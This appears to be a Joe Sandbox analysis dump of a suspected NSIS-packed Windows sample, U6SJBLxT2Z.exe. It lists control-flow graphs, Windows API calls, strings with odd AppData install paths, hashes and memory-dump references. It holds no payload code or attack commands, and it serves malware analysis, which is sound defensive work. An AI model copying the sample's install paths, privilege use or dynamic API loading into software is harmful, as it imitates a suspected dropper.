                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\U6SJBLxT2Z.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\subrigidness\testimonialist$C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne$C:\Users\user\Desktop$C:\Users\user\Desktop\U6SJBLxT2Z.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                  • API String ID: 3441113951-3475716853
                                                                                                                                                                                                  • Opcode ID: ce25b764dac2c90f857618beb49180f73b32db989e1771c1845c73eb86c2c21e
                                                                                                                                                                                                  • Instruction ID: 633452ec6b1f102921f1489b21fe302f429ce1b90f1906ff0e0a9b5b291269fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce25b764dac2c90f857618beb49180f73b32db989e1771c1845c73eb86c2c21e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DD12671600311ABE7207F659D45B3B3AACEB8070AF11443FF581B62D1DBBD89518B6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 139 4055b8-4055d3 140 405762-405769 139->140 141 4055d9-4056a0 GetDlgItem * 3 call 40439c call 404cf5 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405793-4057a0 140->143 144 40576b-40578d GetDlgItem CreateThread CloseHandle 140->144 164 4056a2-4056bc SendMessageW * 2 141->164 165 4056be-4056c1 141->165 146 4057a2-4057a8 143->146 147 4057be-4057c8 143->147 144->143 148 4057e3-4057ec call 4043ce 146->148 149 4057aa-4057b9 ShowWindow * 2 call 40439c 146->149 150 4057ca-4057d0 147->150 151 40581e-405822 147->151 161 4057f1-4057f5 148->161 149->147 154 4057d2-4057de call 404340 150->154 155 4057f8-405808 ShowWindow 150->155 151->148 158 405824-40582a 151->158 154->148 162 405818-405819 call 404340 155->162 163 40580a-405813 call 405479 155->163 158->148 159 40582c-40583f SendMessageW 158->159 166 405941-405943 159->166 167 405845-405870 CreatePopupMenu call 40644e AppendMenuW 159->167 162->151 163->162 164->165 168 4056d1-4056e8 call 404367 165->168 169 4056c3-4056cf SendMessageW 165->169 166->161 176 405872-405882 GetWindowRect 167->176 177 405885-40589a TrackPopupMenu 167->177 178 4056ea-4056fe ShowWindow 168->178 179 40571e-40573f GetDlgItem SendMessageW 168->179 169->168 176->177 177->166 180 4058a0-4058b7 177->180 181 405700-40570b ShowWindow 178->181 182 40570d 178->182 179->166 183 405745-40575d SendMessageW * 2 179->183 184 4058bc-4058d7 SendMessageW 180->184 185 405713-405719 call 40439c 181->185 182->185 183->166 184->184 186 4058d9-4058fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058fe-405925 SendMessageW 186->188 188->188 189 405927-40593b GlobalUnlock SetClipboardData CloseClipboard 188->189 189->166
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405616
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405625
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405662
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405669
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040568A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040569B
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004056AE
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004056BC
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056CF
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,000000FF), ref: 004056F1
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405705
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405726
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405736
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040574F
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040575B
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405634
                                                                                                                                                                                                    • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405778
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000554C,00000000), ref: 00405786
                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040578D
                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004057B1
                                                                                                                                                                                                  • ShowWindow.USER32(0001041C,00000008), ref: 004057B6
                                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405800
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405834
                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405845
                                                                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405859
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405879
                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405892
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058CA
                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004058DA
                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004058E0
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058EC
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004058F6
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040590A
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040592A
                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405935
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040593B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                  • String ID: {
                                                                                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                                                                                  • Opcode ID: 8f25bff0f06489f7a1a8ce70ca033e140048c00b36b59f282442a9f3d67c4887
                                                                                                                                                                                                  • Instruction ID: ef42e6e7ad26681d1de71b6013131fdd69d98400fc0f56e042e978cac442fd71
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f25bff0f06489f7a1a8ce70ca033e140048c00b36b59f282442a9f3d67c4887
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45B138B1900608FFDB11AFA0DE85AAE7B79FB44355F00803AFA41B61A0CB755E51DF68
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 6F77121B: GlobalAlloc.KERNELBASE(00000040,?,6F77123B,?,6F7712DF,00000019,6F7711BE,-000000A0), ref: 6F771225
                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F771C8D
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 6F771CD5
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 6F771CDF
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F771CF2
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6F771DD4
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6F771DD9
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6F771DDE
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F771FC8
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6F772182
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 6F772201
                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 6F772212
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6F77226C
                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000808), ref: 6F772286
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 245916457-0
                                                                                                                                                                                                  • Opcode ID: d8847c65c77b6262cbb5073242c0256271d4762954f4dc2f9bb1113b800ba468
                                                                                                                                                                                                  • Instruction ID: 43932416cb9b548ead84133b24c769850c6d595d66a15fb75764115755ba28b9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8847c65c77b6262cbb5073242c0256271d4762954f4dc2f9bb1113b800ba468
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB226B71D28645DADF30CFA8C6A46EDB7B0FF0A315F10467AD165E6280DBB4A681CF90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 720 405b23-405b49 call 405dee 723 405b62-405b69 720->723 724 405b4b-405b5d DeleteFileW 720->724 726 405b6b-405b6d 723->726 727 405b7c-405b8c call 406411 723->727 725 405cdf-405ce3 724->725 728 405b73-405b76 726->728 729 405c8d-405c92 726->729 733 405b9b-405b9c call 405d32 727->733 734 405b8e-405b99 lstrcatW 727->734 728->727 728->729 729->725 732 405c94-405c97 729->732 735 405ca1-405ca9 call 40676f 732->735 736 405c99-405c9f 732->736 737 405ba1-405ba5 733->737 734->737 735->725 744 405cab-405cbf call 405ce6 call 405adb 735->744 736->725 740 405bb1-405bb7 lstrcatW 737->740 741 405ba7-405baf 737->741 743 405bbc-405bd8 lstrlenW FindFirstFileW 740->743 741->740 741->743 745 405c82-405c86 743->745 746 405bde-405be6 743->746 760 405cc1-405cc4 744->760 761 405cd7-405cda call 405479 744->761 745->729 748 405c88 745->748 749 405c06-405c1a call 406411 746->749 750 405be8-405bf0 746->750 748->729 762 405c31-405c3c call 405adb 749->762 763 405c1c-405c24 749->763 753 405bf2-405bfa 750->753 754 405c65-405c75 FindNextFileW 750->754 753->749 759 405bfc-405c04 753->759 754->746 758 405c7b-405c7c FindClose 754->758 758->745 759->749 759->754 760->736 764 405cc6-405cd5 call 405479 call 4061d7 760->764 761->725 773 405c5d-405c60 call 405479 762->773 774 405c3e-405c41 762->774 763->754 765 405c26-405c2f call 405b23 763->765 764->725 765->754 773->754 777 405c43-405c53 call 405479 call 4061d7 774->777 778 405c55-405c5b 774->778 777->754 778->754
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,75D43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B4C
                                                                                                                                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405B94
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405BB7
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75D43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BBD
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75D43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BCD
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C6D
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405C7C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                                                                                                                                                                  • \*.*, xrefs: 00405B8E
                                                                                                                                                                                                  • "C:\Users\user\Desktop\U6SJBLxT2Z.exe", xrefs: 00405B23
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\U6SJBLxT2Z.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                  • API String ID: 2035342205-2015541744
                                                                                                                                                                                                  • Opcode ID: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                                                                                                                                                  • Instruction ID: 64ad53015563eb9bad7c636b6f780160dd5a6986b89d0419f795064a900c36f2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8941B330804B18AAEB21AB658D89AAF7778EF41714F24417FF802B11D1D77C5E81DE6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(75D43420,004302B8,0042FA70,00405E37,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75D43420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75D43420,C:\Users\user\AppData\Local\Temp\), ref: 0040677A
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406786
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                  • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                  • Instruction ID: c6bcef3f8635fd9f58624a192a3d19c105278d067f6c5fe4f3eb3d2c281a06a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0D012315242206FC3805B386E0C84B7A989F16335B218B36B4AAF21E0D7349C3287BC
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1716503409-0
                                                                                                                                                                                                  • Opcode ID: 9bad2d87d42481bcf1923835a9f25ed74bce28f2b2549fddaf85b808dd24d977
                                                                                                                                                                                                  • Instruction ID: 54686e9db898df2d871e60ec358ff39da9a68b2483c52cd070f19f79977d8214
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bad2d87d42481bcf1923835a9f25ed74bce28f2b2549fddaf85b808dd24d977
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38A00240019455B4E56176A78E86C7F025D8CD2738360073F7433B40E3497C0802243F
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 190 403e8e-403ea0 191 403fe1-403ff0 190->191 192 403ea6-403eac 190->192 194 403ff2-40403a GetDlgItem * 2 call 404367 SetClassLongW call 40140b 191->194 195 40403f-404054 191->195 192->191 193 403eb2-403ebb 192->193 198 403ed0-403ed3 193->198 199 403ebd-403eca SetWindowPos 193->199 194->195 196 404094-404099 call 4043b3 195->196 197 404056-404059 195->197 209 40409e-4040b9 196->209 201 40405b-404066 call 401389 197->201 202 40408c-40408e 197->202 204 403ed5-403ee7 ShowWindow 198->204 205 403eed-403ef3 198->205 199->198 201->202 223 404068-404087 SendMessageW 201->223 202->196 208 404334 202->208 204->205 210 403ef5-403f0a DestroyWindow 205->210 211 403f0f-403f12 205->211 218 404336-40433d 208->218 216 4040c2-4040c8 209->216 217 4040bb-4040bd call 40140b 209->217 219 404311-404317 210->219 213 403f14-403f20 SetWindowLongW 211->213 214 403f25-403f2b 211->214 213->218 221 403f31-403f42 GetDlgItem 214->221 222 403fce-403fdc call 4043ce 214->222 226 4042f2-40430b DestroyWindow EndDialog 216->226 227 4040ce-4040d9 216->227 217->216 219->208 225 404319-40431f 219->225 228 403f61-403f64 221->228 229 403f44-403f5b SendMessageW IsWindowEnabled 221->229 222->218 223->218 225->208 231 404321-40432a ShowWindow 225->231 226->219 227->226 232 4040df-40412c call 40644e call 404367 * 3 GetDlgItem 227->232 233 403f66-403f67 228->233 234 403f69-403f6c 228->234 229->208 229->228 231->208 260 404136-404172 ShowWindow KiUserCallbackDispatcher call 404389 EnableWindow 232->260 261 40412e-404133 232->261 238 403f97-403f9c call 404340 233->238 239 403f7a-403f7f 234->239 240 403f6e-403f74 234->240 238->222 243 403fb5-403fc8 SendMessageW 239->243 245 403f81-403f87 239->245 240->243 244 403f76-403f78 240->244 243->222 244->238 248 403f89-403f8f call 40140b 245->248 249 403f9e-403fa7 call 40140b 245->249 258 403f95 248->258 249->222 257 403fa9-403fb3 249->257 257->258 258->238 264 404174-404175 260->264 265 404177 260->265 261->260 266 404179-4041a7 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 4041a9-4041ba SendMessageW 266->267 268 4041bc 266->268 269 4041c2-404201 call 40439c call 403e6f call 406411 lstrlenW call 40644e SetWindowTextW call 401389 267->269 268->269 269->209 280 404207-404209 269->280 280->209 281 40420f-404213 280->281 282 404232-404246 DestroyWindow 281->282 283 404215-40421b 281->283 282->219 284 40424c-404279 CreateDialogParamW 282->284 283->208 285 404221-404227 283->285 284->219 286 40427f-4042d6 call 404367 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 284->286 285->209 287 40422d 285->287 286->208 292 4042d8-4042eb ShowWindow call 4043b3 286->292 287->208 294 4042f0 292->294 294->219
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?), ref: 00403ECA
                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403EE7
                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00403EFB
                                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F17
                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403F38
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000000,00000000), ref: 00403F4C
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F53
                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00404001
                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0040400B
                                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404025
                                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404076
                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 0040411C
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040413D
                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040414F
                                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 0040416A
                                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404180
                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00404187
                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040419F
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041B2
                                                                                                                                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 004041DC
                                                                                                                                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 004041F0
                                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404324
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
